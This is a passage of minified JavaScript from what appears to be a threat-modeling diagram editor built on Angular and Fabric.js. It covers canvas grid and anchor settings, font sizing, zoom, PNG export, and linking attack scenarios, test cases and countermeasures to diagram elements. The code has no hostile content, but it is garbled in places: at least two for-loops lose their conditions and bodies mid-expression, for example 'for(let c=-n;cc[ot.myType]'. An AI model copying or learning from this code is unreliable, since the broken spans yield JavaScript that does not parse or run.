t})(),_i=(()=>{return(t=_i||(_i={})).North="n",t.East="e",t.South="s",t.West="w",t.NorthWest="n-w",t.NorthEast="n-e",t.SouthEast="s-e",t.SouthWest="s-w",t.EasternNorth="en",t.EasternSouth="es",t.WesternNorth="wn",t.WesternSouth="ws",t.NorthernWest="nw",t.NorthernEast="ne",t.SouthernWest="sw",t.SouthernEast="se",_i;var t})();let D2=(()=>{class t{constructor(e,i,n,r,c,d){this.dataService=i,this.theme=n,this.dialog=r,this.locStorage=c,this.translate=d,this.mouseMode=Zs.Mouse,this.xMax=null,this.yMax=null,this.isInitalized=!1,this.isDarkMode=!1,this.blockSelectionChangedAfterReceive=!1,this.blockSelectionChangedAfterSend=!1,this.tmpFlowLine=null,this.tmpFlowLineEndpoint=null,this.blockCreateLine=!1,this.fontSizeConfigs=[{Name:11,Type:8},{Name:12,Type:9},{Name:14,Type:10},{Name:16,Type:12},{Name:18,Type:14},{Name:20,Type:16}],this.StrokeColor="black",this.StrokeWidth=2,this.BackgroundColor="black",this.CanvasScreenWidth=0,this.CanvasScreenHeight=0,this.SaveImageWithGrid=!1,this.mouseMovingState=gf.None,this.SelectionChanged=new Tt,this.NavTreeChanged=new Tt,this.subscriptionsLineType=[],this.subscriptionsFlowAnchor=[],this.subscriptionsScaling=[],this.isSaving=!1,this.overTimeoutBuffer={},this.arrowVisibilityBuffer={},this.seletedFlow=null,this.intersectionPairs=[],this.blockCheckingIntersection=!1,this.Diagram=e}get currentFontSizeConfig(){return this.fontSizeConfigs[this.FontSizeConfigIndex]}get CanCopy(){return null!=this.copyID}get MouseMode(){return this.mouseMode}set MouseMode(e){this.mouseMode=e,this.Canvas.selection=!1,e==Zs.Mouse?this.Canvas.isDragging&&(this.arrowVisibilityRestore(),this.Canvas.isDragging=!1):e==Zs.Pan?(this.arrowVisibilityStore(),this.Canvas.isDragging=!0):(this.SelectedElement=null,this.Canvas.selection=!0,this.mouseMovingState=gf.Selecting)}get ShowGrid(){let e=null,i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_SHOW_GRID);return i&&(e=JSON.parse(i)),!e||null==e[this.Diagram.DiagramType]||e[this.Diagram.DiagramType]}set ShowGrid(e){let i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_SHOW_GRID),n={};null!=i&&(n=JSON.parse(i)),n[this.Diagram.DiagramType]=e;let c=d=>{d.forEach(T=>{(d=>{d[ot.myType]==wt.GridLine&&(d[ot.visible]=e)})(T),T._objects&&c(T._objects)})};c(this.Canvas.getObjects()),this.locStorage.Set(si.PAGE_MODELING_DIAGRAM_SHOW_GRID,JSON.stringify(n)),this.Canvas.requestRenderAll(),this.onCanvasModified()}get StickToGrid(){let e=null,i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_STICK_GRID);return i&&(e=JSON.parse(i)),!e||null==e[this.Diagram.DiagramType]||e[this.Diagram.DiagramType]}set StickToGrid(e){let i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_STICK_GRID),n={};null!=i&&(n=JSON.parse(i)),n[this.Diagram.DiagramType]=e,this.locStorage.Set(si.PAGE_MODELING_DIAGRAM_STICK_GRID,JSON.stringify(n))}get FlowArrowPosition(){let e=null,i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_ARROW_POS);return i&&(e=JSON.parse(i)),e&&e[this.Diagram.DiagramType]?Number(e[this.Diagram.DiagramType]):this.Diagram.DiagramType==xn.Context?wn.Both:this.Diagram.DiagramType==xn.UseCase?wn.End:wn.Initiator}set FlowArrowPosition(e){let i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_ARROW_POS),n={};null!=i&&(n=JSON.parse(i)),n[this.Diagram.DiagramType]=[wn.Both,wn.Initiator].includes(e)?this instanceof $T?wn.Initiator:wn.Both:e,this.locStorage.Set(si.PAGE_MODELING_DIAGRAM_ARROW_POS,JSON.stringify(n))}get BendFlow(){let e=null,i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_ARROW_BEND);return i&&(e=JSON.parse(i)),e&&null!=e[this.Diagram.DiagramType]?e[this.Diagram.DiagramType]:this.Diagram.DiagramType==xn.DataFlow}set BendFlow(e){let i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_ARROW_BEND),n={};null!=i&&(n=JSON.parse(i)),n[this.Diagram.DiagramType]=e,this.locStorage.Set(si.PAGE_MODELING_DIAGRAM_ARROW_BEND,JSON.stringify(n))}get AnchorCount(){let e=null,i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_ANCHOR_COUNT);return i&&(e=JSON.parse(i)),e&&null!=e[this.Diagram.DiagramType]?e[this.Diagram.DiagramType]:4}set AnchorCount(e){let i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_ANCHOR_COUNT),n={};null!=i&&(n=JSON.parse(i)),n[this.Diagram.DiagramType]=e,this.locStorage.Set(si.PAGE_MODELING_DIAGRAM_ANCHOR_COUNT,JSON.stringify(n)),this.Canvas.getObjects().forEach(r=>{r._objects&&r._objects.filter(d=>d[ot.myType]==wt.FlowAnchor).forEach(d=>{8==e?d.set(ot.visible,!0):[_i.NorthWest,_i.NorthEast,_i.SouthEast,_i.SouthWest].includes(d[ot.fa])&&d.set(ot.visible,!1)})})}get CanSetAnchorCount(){return[xn.Context,xn.DataFlow].includes(this.Diagram.DiagramType)}get ShowName(){let e=null,i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_ARROW_NAME);return i&&(e=JSON.parse(i)),e&&null!=e[this.Diagram.DiagramType]?e[this.Diagram.DiagramType]:this.Diagram.DiagramType==xn.DataFlow}set ShowName(e){let i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_ARROW_NAME),n={};null!=i&&(n=JSON.parse(i)),n[this.Diagram.DiagramType]=e,this.locStorage.Set(si.PAGE_MODELING_DIAGRAM_ARROW_NAME,JSON.stringify(n))}get FontSizeConfigIndex(){const e=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_TEXTSIZE_INDEX);return null==e?3:Number(e)}set FontSizeConfigIndex(e){this.locStorage.Set(si.PAGE_MODELING_DIAGRAM_TEXTSIZE_INDEX,String(e)),this.changeFontSize()}get ObjectCountToInit(){if(!this.Diagram.Elements)return"";let e=this.Diagram.Elements.GetChildrenFlat().filter(i=>!i.UserCheckedElement).length;return e>0?e.toString():""}get IsCreatingFlow(){return null!=this.tmpFlowLine}get IsObjectSelected(){var e;return(null===(e=this.Canvas)||void 0===e?void 0:e.getActiveObjects().length)>0}get SelectedElement(){var e;let i=null===(e=this.Canvas)||void 0===e?void 0:e.getActiveObjects();if(1==(null==i?void 0:i.length)){if(i[0][ot.ID])return this.getViewBaseElement(this.Canvas.getActiveObject()[ot.ID]);if(i[0][ot.flowID])return this.getViewBaseElement(this.getCanvasElementByCanvasID(i[0][ot.flowID])[ot.ID])}return null}set SelectedElement(e){if(!this.Canvas||this.MouseMode==Zs.Move||this.blockSelectionChangedAfterSend)return;this.blockSelectionChangedAfterReceive=!0,setTimeout(()=>{this.blockSelectionChangedAfterReceive=!1},250);let i=this.Canvas.getActiveObject();if(i&&i[ot.ID]==(null==e?void 0:e.ID))return;if(null==e&&this.SelectedElement)return this.Canvas.discardActiveObject(),void this.onCanvasModified();this.Canvas.discardActiveObject();let n=this.Canvas.getObjects();try{let r=n.find(c=>c[ot.ID]==e.ID);this.Canvas.setActiveObject(r),r[ot.elementTypeID]==Et.DataFlow&&this.setFlowSelected(r,!0)}catch(r){}this.Canvas.renderAll()}SetMouse(){this.MouseMode=Zs.Mouse}SetPan(){this.MouseMode=Zs.Pan}SetMove(){this.MouseMode=Zs.Move}Save(){this.ToJSONString()}TextIncrease(){const e=this.getCanvasElementByID(this.SelectedElement.ID);let i=null,n=null,r=null;e._objects?(i=e._objects.find(d=>d[ot.myType]==wt.ElementType),r=e._objects.find(d=>d[ot.myType]==wt.ElementPhyElement),n=e._objects.find(d=>d[ot.myType]==wt.ElementName)):e[ot.myType]==wt.DataFlowLine&&(n=this.getCanvasElementByCanvasID(e[ot.textID]));let c=null;i?c=this.fontSizeConfigs[this.fontSizeConfigs.findIndex(d=>d.Type==i[ot.fontSize])+1]:n&&(c=this.fontSizeConfigs[this.fontSizeConfigs.findIndex(d=>d.Name==n[ot.fontSize])+1]),c&&(n&&n.set(ot.fontSize,e[ot.myType]!=wt.TrustArea?c.Name:c.Type),i&&i.set(ot.fontSize,c.Type),r&&r.set(ot.fontSize,c.Type),this.Canvas.requestRenderAll(),this.onCanvasModified())}TextDecrease(){const e=this.getCanvasElementByID(this.SelectedElement.ID);let i=null,n=null,r=null;e._objects?(i=e._objects.find(d=>d[ot.myType]==wt.ElementType),r=e._objects.find(d=>d[ot.myType]==wt.ElementPhyElement),n=e._objects.find(d=>d[ot.myType]==wt.ElementName)):e[ot.myType]==wt.DataFlowLine&&(n=this.getCanvasElementByCanvasID(e[ot.textID]));let c=null;i?c=this.fontSizeConfigs[this.fontSizeConfigs.findIndex(d=>d.Type==i[ot.fontSize])-1]:n&&(c=this.fontSizeConfigs[this.fontSizeConfigs.findIndex(d=>d.Name==n[ot.fontSize])-1]),c&&(n&&n.set(ot.fontSize,e[ot.myType]!=wt.TrustArea?c.Name:c.Type),i&&i.set(ot.fontSize,c.Type),r&&r.set(ot.fontSize,c.Type),this.Canvas.requestRenderAll(),this.onCanvasModified())}SendToBack(){this.Canvas.getActiveObjects().forEach(e=>this.Canvas.sendToBack(e)),this.SelectedElement=null,this.onCanvasModified()}SendBackwards(){this.Canvas.getActiveObjects().forEach(e=>this.Canvas.sendBackwards(e)),this.SelectedElement=null,this.onCanvasModified()}BringForward(){this.Canvas.getActiveObjects().forEach(e=>this.Canvas.bringForward(e)),this.onCanvasModified()}BringToFront(){this.Canvas.getActiveObjects().forEach(e=>this.Canvas.bringToFront(e)),this.onCanvasModified()}AddAnnotation(){let e=new Ei.fabric.IText("Text Annotation",{left:100,top:40,fill:this.StrokeColor,cavnasID:Fo(),myType:wt.Annotation,fontSize:16,transparentCorners:!0});this.Canvas.add(e),this.onCanvasModified()}SelectNextUninitObject(){let e=this.Diagram.Elements.GetChildrenFlat().filter(n=>!n.UserCheckedElement),i=e[e.length-1];i.UserCheckedElement=!0,this.SelectedElement=i,this.SelectionChanged.emit(i)}AddThreat(){if(this.SelectedElement){let e=this.dataService.Project.CreateAttackScenario(this.Diagram.ID,!1);e.SetMapping("",[],this.SelectedElement,[this.SelectedElement],null,null,null,null),e.IsGenerated=!1,this.dialog.OpenAttackScenarioDialog(e,!0).subscribe(i=>{i||this.dataService.Project.DeleteAttackScenario(e)})}}AddTestCase(){if(this.SelectedElement){const e=this.dataService.Project.CreateTestCase();e.AddLinkedElement(this.SelectedElement),this.dialog.OpenTestCaseDialog(e,!0).subscribe(i=>{i||this.dataService.Project.DeleteTestCase(e)})}}AddCountermeasure(){if(this.SelectedElement){let e=this.dataService.Project.CreateCountermeasure(this.Diagram.ID,!1);e.SetMapping(null,[this.SelectedElement],[]),this.dialog.OpenCountermeasureDialog(e,!0,this.Diagram.Elements.GetChildrenFlat()).subscribe(i=>{i||this.dataService.Project.DeleteCountermeasure(e)})}}CancelCreateFlow(){this.tmpFlowLine&&(this.Canvas.remove(this.tmpFlowLine),this.tmpFlowLine=null)}SetZoom(e,i=null,n=null){i&&n?this.Canvas.zoomToPoint({x:i,y:n},e):this.Canvas.setZoom(e)}OnResized(e,i,n=!0){if(this.initializeCanvas(i),this.Canvas){const r=this.getCanvasSize();if(this.CanvasScreenWidth=e.newRect.width,this.CanvasScreenHeight=e.newRect.height-5,n){const d=e.newRect.height>r[3]?e.newRect.height:r[3];this.Canvas.setWidth(e.newRect.width>r[2]?e.newRect.width:r[2]),this.Canvas.setHeight(d-5)}else this.Canvas.setWidth(e.newRect.width),this.Canvas.setHeight(e.newRect.height-5);this.Canvas.renderAll()}}OnOuterCanvasMouseDown(e){4==e.buttons&&(this.MouseMode=Zs.Pan,this.Canvas.lastPosX=e.clientX,this.Canvas.lastPosY=e.clientY)}OnOuterCanvasMouseUp(e){this.MouseMode==Zs.Pan&&(this.MouseMode=Zs.Mouse)}OnDeleteElement(e){this.dialog.OpenDeleteObjectDialog(e).subscribe(i=>{i&&this.deleteElement(e.ID)})}ToJSONString(e=!1){let i=JSON.stringify(this.Canvas.toJSON(Object.keys(ot).filter(n=>"string"==typeof n)),null,e?2:0);return this.Diagram.Canvas=i,i}FromJSONString(e){this.Canvas.loadFromJSON(JSON.parse(e),i=>{null!=i?console.error(i):(this.Diagram.Canvas=e,this.onFromJSONString())})}GetImage(){return this.Canvas.toDataURL({format:"image/png"})}SaveImage(){const e=ns.FromJSON(JSON.parse(JSON.stringify(this.Diagram.ToJSON())),this.dataService.Project,this.dataService.Project.Config),i=1500,r=document.createElement("div");r.style.width=i.toString()+"px",r.style.height=750..toString()+"px",r.style.pointerEvents="none";let d,c=new xb(new DOMRectReadOnly(0,0,i,750),null);d=e instanceof b2?new R7(e,this.dataService,this.theme,this.dialog,this.locStorage,this.translate,e.IsUseCaseDiagram?aa.UseCase:aa.Context):new $T(e,this.dataService,this.theme,this.dialog,this.locStorage,this.translate),d.OnResized(c,r),d.PrintMode(this.SaveImageWithGrid);const T=d.FitToCanvas(i);c=new xb(new DOMRectReadOnly(0,0,1510,T[1]+10),null),r.style.height=T[1].toString()+"px",d.OnResized(c,r,!1);const k=window.open(),q=new Image;q.onload=()=>{k.document.body.append(q),this.theme.IsDarkMode&&d.SetColors(!0)},q.src=d.GetImage();const Y=document.createElement("a");document.body.appendChild(Y),Y.href=q.src,Y.target="_self",Y.download=this.Diagram.Name+".png",Y.click(),document.body.removeChild(Y)}SetColors(e){this.isDarkMode=e,e?(this.StrokeColor="white",this.BackgroundColor=t.BackgroundColorDark):(this.StrokeColor="black",this.BackgroundColor=t.BackgroundColorLight),this.setCanvasColor()}PrintMode(e){this.SetColors(!1);const i=c=>{if(c.stroke&&c.stroke==this.theme.Primary&&c.set("stroke",this.StrokeColor),c.fill&&c.fill==this.theme.Primary){let d="";"white"==c.fill?d="black":"black"==c.fill||"rgb(0,0,0)"==c.fill?d="white":"transparent"==c.fill?d=c.fill:c.fill==t.BackgroundColorDark?d=t.BackgroundColorLight:c.fill==t.BackgroundColorLight?d=t.BackgroundColorDark:c.fill==this.theme.Primary&&(d=this.theme.Primary),c.set("fill",d)}if(c.cornerColor&&c.cornerColor==this.theme.Primary){let d="";"transparent"==c.cornerColor?d="transparent":"white"==c.cornerColor?d="black":"black"==c.cornerColor&&(d="white"),c.set("cornerColor",d)}},r=c=>{c.forEach(d=>{i(d),(c=>{c[ot.myType]==wt.GridLine&&(c[ot.visible]=e)})(d),d._objects&&r(d._objects)})};r(this.Canvas.getObjects())}FitToCanvas(e,i=0){const n=this.getCanvasSize();let r=n[0],c=n[1],d=n[2],T=n[3],k=this.Canvas.viewportTransform;k[4]=-r,k[5]=-c;let q=e/(d-r),Y=(T-c)*q;if(i>0&&Y>i){const te=i/Y;q*=te,e*=te,Y*=te}return this.Canvas.setZoom(q),this.Canvas.requestRenderAll(),[e,Y]}initializeCanvas(e){if(this.isInitalized)return!1;this.isInitalized=!0;let i=document.createElement("canvas");i.style.marginTop="1px",e.appendChild(i),this.Canvas=new Ei.fabric.Canvas(i),this.Canvas.selection=!1,this.Canvas.selectionFullyContained=!0,this.Canvas.targetFindTolerance=2,this.Canvas.uniformScaling=!1,this.Canvas.setWidth(e.clientWidth),this.CanvasScreenWidth=e.clientWidth,this.CanvasScreenHeight=e.clientHeight-5,this.Canvas.setHeight(e.clientHeight-5),this.SetColors(this.theme.IsDarkMode),this.theme.ThemeChanged.subscribe(c=>{this.SetColors(c)}),Ei.fabric.Object.prototype.transparentCorners=!1,Ei.fabric.Object.prototype.cornerColor=this.StrokeColor,Ei.fabric.Object.prototype.cornerStyle="circle",Ei.fabric.Object.prototype.controls.deleteControl=new Ei.fabric.Control({x:.5,y:-.5,offsetX:0,offsetY:0,cursorStyle:"pointer",mouseUpHandler:(c,d)=>{let T=null;if(d.target[ot.ID]&&d.target[ot.elementTypeID]!=Et.DataFlow)T=this.getViewBaseElement(d.target[ot.ID]);else if(d.target[ot.elementTypeID]==Et.DataFlow||d.target[ot.flowID]){let k=d.target[ot.elementTypeID]==Et.DataFlow?d.target:this.getCanvasElementByCanvasID(d.target[ot.flowID]);T=this.getViewBaseElement(k[ot.ID])}T&&T.ID!=this.Diagram.Elements.ID?this.OnDeleteElement(T):this.Canvas.remove(d.target),this.Canvas.requestRenderAll()},render:this.renderIcon}),Ei.fabric.Canvas.prototype.getAbsoluteCoords=function(c){return{left:c.left+this._offset.left,top:c.top+this._offset.top}},document.onkeydown=c=>{"Escape"==c.key&&this.CancelCreateFlow()},this.Canvas.on("mouse:wheel",c=>this.onCanvasMouseWheel(c)),this.Canvas.on("mouse:move",c=>this.onCanvasMouseMove(c)),this.Canvas.on("mouse:down",c=>this.onCanvasMouseDown(c)),this.Canvas.on("mouse:up",c=>this.onCanvasMouseUp(c)),this.Canvas.on("mouse:over",c=>this.onCanvasMouseOver(c)),this.Canvas.on("mouse:out",c=>this.onCanvasMouseOut(c)),this.Canvas.on("drop",c=>this.onCanvasDrop(c)),this.Canvas.on("object:modified",c=>this.onCanvasModified()),this.Canvas.on("object:moving",c=>this.onCanvasObjectMoving(c)),this.Canvas.on("object:scaling",c=>{this.blockCheckingIntersection=!0}),this.Canvas.on("selection:updated",c=>this.onCanvasSelectionChanged(c)),this.Canvas.on("selection:created",c=>this.onCanvasSelectionChanged(c)),this.Canvas.on("selection:cleared",c=>this.onCanvasSelectionChanged(c)),this.Diagram.Elements.GetChildrenFlat().forEach(c=>{c.NameChanged.subscribe(d=>this.changeObjectName(c.ID)),c.OutOfScopeChanged.subscribe(d=>this.changeObjectBorder(c.ID)),c instanceof lc?(c.TypeChanged.subscribe(d=>this.changeObjectType(c.ID,d.Name)),c.PhysicalElementChanged.subscribe(d=>this.changeObjectPhysicalElement(c.ID,d))):c instanceof os&&c.TypeChanged.subscribe(d=>this.changeObjectType(c.ID,nM.ToString(d)))}),this.Diagram.Canvas&&this.FromJSONString(this.Diagram.Canvas);const n=3e3;for(let c=-n;cc[ot.myType]==wt.GridLine).forEach(c=>this.Canvas.sendToBack(c));const r=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_ZOOM);return null!=r&&this.SetZoom(Number(r)),!0}onFromJSONString(){this.setCanvasColor();let e=[],i=[];const n=(r,c,d)=>{let k=new Ei.fabric.Circle({left:r,top:c,radius:6.5,fill:this.StrokeColor,opacity:.15});const q=r+6.5,Y=c+6.5,te=4.33;let pe=new Ei.fabric.Line([q-te,Y-te,q+te,Y+te],{stroke:this.theme.Primary,selectable:!1}),Re=new Ei.fabric.Line([q-te,Y+te,q+te,Y-te],{stroke:this.theme.Primary,selectable:!1});return new Ei.fabric.Group([k,pe,Re],{left:r,top:c,hasControls:!1,hasBorders:!1,lockRotation:!0,opacity:0,fa:d,myType:wt.FlowAnchor,canvasID:Fo()})};this.Canvas.getObjects().forEach(r=>{r._objects&&r._objects.filter(d=>null!=d[ot.fa]).forEach(d=>{if(d._objects){if(r[ot.myType]==wt.Interactor){let T=-6.5,k=-19.29;d[ot.fa]==_i.East?T=19:d[ot.fa]==_i.West?T=-28.5:d[ot.fa]==_i.North?k=-38.79:d[ot.fa]==_i.South&&(k=3.71),d.left=T,d.top=k,d.setCoords()}}else{const T=n(r.left+r.width/2+d.left,r.top+r.height/2+d.top,d[ot.fa]);this.Canvas.add(T);const k=r._objects.indexOf(d);r._objects.splice(k,1),r.addWithUpdate(T),this.Canvas.remove(d),console.log("update flow anchor")}})}),this.Canvas.getObjects().forEach(r=>{var c,d,T,k,q;let Y=null;if(r[ot.ID])Y=this.getViewBaseElement(r[ot.ID]);else if(r[ot.flowID]){let te=this.getCanvasElementByCanvasID(r[ot.flowID]);te&&te[ot.ID]&&(Y=this.getViewBaseElement(te[ot.ID]),Y&&(Y instanceof M2||Y instanceof rs)&&(this.subscriptionsLineType.includes(Y.ID)||(null===(c=Y.LineTypeChanged)||void 0===c||c.subscribe(pe=>this.flowChangeLineType(Y.ID,pe)),null===(d=Y.ArrowPosChanged)||void 0===d||d.subscribe(pe=>this.flowUpdateFlowArrow(Y.ID)),null===(T=Y.BendFlowChanged)||void 0===T||T.subscribe(pe=>this.flowChangeBending(Y.ID,pe)),null===(k=Y.DirectionChanged)||void 0===k||k.subscribe(pe=>this.flowChangeDirection(Y.ID)),null===(q=Y.AnchorChanged)||void 0===q||q.subscribe(pe=>this.flowChangeAnchor(Y.ID,pe)),this.subscriptionsLineType.push(Y.ID))))}r._objects&&r._objects.filter(pe=>null!=pe[ot.fa]).forEach(pe=>{this.subscriptionsFlowAnchor.includes(pe[ot.canvasID])||(pe.on("mousedown",Re=>this.onFlowAnchorHit(Re)),this.subscriptionsFlowAnchor.push(pe[ot.canvasID]))}),null!=Y||[wt.Annotation,wt.TextPosPoint].includes(r[ot.myType])?(Y&&this.changeObjectName(Y.ID),r[ot.elementTypeID]==Et.DataFlow?e.push(r):[wt.DataFlowArrowE,wt.DataFlowArrowS].includes(r[ot.myType])&&i.push(r),(!Y||Y&&!this.subscriptionsScaling.includes(Y.ID))&&(this.subscribeScaling(r),Y&&this.subscriptionsScaling.push(Y.ID))):this.Canvas.remove(r)}),i.forEach(r=>{let c="";for(let k=0;k{d[k]=r[k]}),this.Canvas.remove(r),this.Canvas.add(d)}),e.forEach(r=>{var c,d,T;let q=r.path[0][2],Y=r.path[1][1],te=r.path[1][2],pe=r.path[1][3],Re=r.path[1][4],Fe=["M",r.path[0][1].toString(),q.toString(),"Q",Y.toString(),te.toString(),pe.toString(),Re.toString()].join(" "),Ne=new Ei.fabric.Path(Fe,{fill:"",stroke:this.StrokeColor,strokeWidth:this.StrokeWidth,objectCaching:!1,canvasID:r[ot.canvasID],selectable:!0,lockMovementX:!0,lockMovementY:!0,lockScalingX:!0,lockScalingY:!0,hasBorders:!1,hasControls:!1,transparentCorners:!0,cornerColor:"transparent",perPixelTargetFind:!0});[ot.ID,ot.elementTypeID,ot.myType,ot.strokeDashArray,ot.arrowEID,ot.arrowSID,ot.textID,ot.bendFlow,ot.p0ID,ot.p1ID,ot.p2ID,ot.fa1,ot.fe1,ot.fa2,ot.fe2,ot.fontSize].forEach(Ze=>{Ne.set(Ze,r[Ze])}),Ne.setControlsVisibility({mtr:!1,mts:!1}),this.Canvas.add(Ne),this.Canvas.remove(r),this.flowUpdateText(Ne),this.flowUpdateFlowArrow(Ne[ot.ID]),null===(c=this.getCanvasElementByCanvasID(Ne[ot.p0ID]))||void 0===c||c.set("opacity",0),null===(d=this.getCanvasElementByCanvasID(Ne[ot.p1ID]))||void 0===d||d.set("opacity",0),null===(T=this.getCanvasElementByCanvasID(Ne[ot.p2ID]))||void 0===T||T.set("opacity",0);let ut=this.getCanvasElementByCanvasID(r[ot.arrowEID]);this.Canvas.bringToFront(ut),ut=this.getCanvasElementByCanvasID(r[ot.arrowSID]),this.Canvas.bringToFront(ut)}),this.Canvas.getObjects().filter(r=>r[ot.myType]==wt.DataFlowCircle).forEach(r=>r.selectable=!1),this.Canvas.getObjects().filter(r=>[Et.LogDataStore,Et.LogProcessing,Et.LogProcessing,Et.LogTrustArea].includes(r[ot.elementTypeID])).forEach(r=>{const c=this.getViewBaseElement(r[ot.ID]);null!=c.PhysicalElement&&this.changeObjectPhysicalElement(r[ot.ID],c.PhysicalElement)}),this.Canvas.getObjects().forEach(r=>{if(r._objects){const c=r._objects.find(d=>d[ot.myType]==wt.ElementType);c&&(c.text=c.text.replace("<<","\xab").replace(">>","\xbb"))}}),this.Canvas.getObjects().forEach(r=>this.fireScaling(r)),this.Canvas.requestRenderAll()}onCanvasModified(){this.checkIntersection(),this.isSaving||(this.isSaving=!0,setTimeout(()=>{this.isSaving=!1,this.Save()},1e3))}onCanvasMouseWheel(e){if(e.e.ctrlKey){let i=e.e.deltaY,n=this.Canvas.getZoom();n*=Math.pow(.999,i),n>3&&(n=3),n<.33&&(n=.33),this.SetZoom(n,e.e.offsetX,e.e.offsetY),e.e.preventDefault(),e.e.stopPropagation()}}onCanvasMouseMove(e){if((1==e.e.buttons||4==e.e.buttons)&&this.Canvas.isDragging){let i=this.Canvas.viewportTransform;i[4]+=e.e.clientX-this.Canvas.lastPosX,i[4]>0&&(i[4]=0),i[5]+=e.e.clientY-this.Canvas.lastPosY,i[5]>0&&(i[5]=0),this.Canvas.requestRenderAll(),this.Canvas.lastPosX=e.e.clientX,this.Canvas.lastPosY=e.e.clientY}this.tmpFlowLine&&(this.tmpFlowLine.set({x2:e.absolutePointer.x,y2:e.absolutePointer.y}),this.tmpFlowLine.setCoords(),this.Canvas.requestRenderAll())}onCanvasMouseDown(e){this.Canvas.isDragging&&(this.Canvas.lastPosX=e.e.clientX,this.Canvas.lastPosY=e.e.clientY)}onCanvasMouseUp(e){var i;if(this.Canvas.setViewportTransform(this.Canvas.viewportTransform),this.MouseMode==Zs.Pan)this.SetMouse();else if(this.MouseMode==Zs.Mouse){let n=this.blockCheckingIntersection;this.blockCheckingIntersection=!1,n&&this.checkIntersection(),(null===(i=e.transform)||void 0===i?void 0:i.target)&&e.transform.target[ot.ID]&&!this.blockSelectionChangedAfterSend&&!this.blockCheckingIntersection&&this.getViewBaseElement(e.transform.target[ot.ID])==this.SelectedElement&&(this.instanceOfContainer(this.SelectedElement)&&this.SendToBack(),this.SelectionChanged.emit(null))}}onCanvasMouseOver(e){if(e.target){if(e.target._objects){let i=e.target,n=e.target._objects.filter(r=>ot.fa in r);if(e.target[ot.myType]==wt.FlowAnchor&&(n=e.target.group._objects.filter(r=>ot.fa in r),i=e.target.group),n.length>0){const r=this.overTimeoutBuffer[i[ot.canvasID]];r&&(clearTimeout(r),delete this.overTimeoutBuffer[i[ot.canvasID]]),n.forEach(c=>{c.set(ot.opacity,1),this.Canvas.bringToFront(c)}),this.Canvas.requestRenderAll()}}null!=e.target[ot.t0ID]&&(this.getCanvasElementByCanvasID(e.target[ot.t0ID]).set(ot.opacity,1),this.Canvas.requestRenderAll())}}onCanvasMouseOut(e){if(e.target){if(e.target._objects){let i=e.target,n=e.target._objects.filter(r=>ot.fa in r);e.target[ot.myType]==wt.FlowAnchor&&(n=e.target.group._objects.filter(r=>ot.fa in r),i=e.target.group),n.length>0&&null==this.overTimeoutBuffer[i[ot.canvasID]]&&(this.overTimeoutBuffer[i[ot.canvasID]]=setTimeout(()=>{n.forEach(r=>{r.set(ot.opacity,0)}),delete this.overTimeoutBuffer[i[ot.canvasID]],this.Canvas.requestRenderAll()},500))}if(null!=e.target[ot.t0ID]){let i=this.getCanvasElementByCanvasID(e.target[ot.t0ID]);setTimeout(()=>{i.set(ot.opacity,0),this.Canvas.requestRenderAll()},1500)}}}arrowVisibilityStore(){this.arrowVisibilityBuffer={},this.Canvas.getObjects().filter(e=>[wt.DataFlowArrowE,wt.DataFlowArrowS].includes(e[ot.myType])).forEach(e=>{this.arrowVisibilityBuffer[e[ot.canvasID]]=e[ot.visible],e.set(ot.visible,!1),e.set("dirty",!0)}),this.Canvas.requestRenderAll()}arrowVisibilityRestore(){Object.keys(this.arrowVisibilityBuffer).forEach(e=>{const i=this.getCanvasElementByCanvasID(e),n=this.arrowVisibilityBuffer[e];i.set(ot.visible,null==n||n)}),this.Canvas.getObjects().forEach(e=>this.onMovingObject(e)),this.Canvas.requestRenderAll()}onCanvasObjectMoving(e){if(this.MouseMode==Zs.Move)return this.mouseMovingState==gf.Selecting&&(this.arrowVisibilityStore(),this.mouseMovingState=gf.Moving),void this.Canvas.getObjects().forEach(i=>this.onMovingObject(i));this.onMovingObject(e.target)}onMovingObject(e){if(this.blockCheckingIntersection=!0,["p1"].includes(e[ot.name])?this.dfOnPointMoving(e):e[ot.myType]==wt.TextPosPoint?this.textOnMovingPoint(e):e[ot.t0ID]&&this.textOnMovingText(e),e[ot.ID]){const i=n=>Math.round(n/t.GridSize*2)%2==0;this.ShowGrid&&this.StickToGrid&&(i(e.left)&&e.set("left",Math.round(e.left/t.GridSize)*t.GridSize),i(e.top)&&e.set("top",Math.round(e.top/t.GridSize)*t.GridSize),e.setCoords())}e[ot.dfs]&&e[ot.dfs].forEach(i=>{const n=this.getCanvasElementByCanvasID(i);let r=n[ot.fe2]==e[ot.canvasID],c=this.getFlowAnchorPoint(r?n[ot.fa2]:n[ot.fa1],e),T=this.getCanvasElementByCanvasID(n[r?ot.p2ID:ot.p0ID]);T.left=c[0],T.top=c[1];let k=0,q=0;if(e.group&&(k=e.group.left+e.group.width/2,q=e.group.top+e.group.height/2),r?(n.path[1][3]=k+c[0],n.path[1][4]=q+c[1]):(n.path[0][1]=k+c[0],n.path[0][2]=q+c[1]),0==n[ot.bendFlow]){let pe=this.getCanvasElementByCanvasID(n[ot.p1ID]),Fe=n.path[0][2]+(n.path[1][4]-n.path[0][2])/2;pe.left=n.path[1][1]=n.path[0][1]+(n.path[1][3]-n.path[0][1])/2,pe.top=n.path[1][2]=Fe}let Y=n._calcDimensions();n.set({width:Y.width,height:Y.height,left:Y.left,top:Y.top,pathOffset:{x:Y.width/2+Y.left,y:Y.height/2+Y.top},dirty:!0}),n.setCoords();let 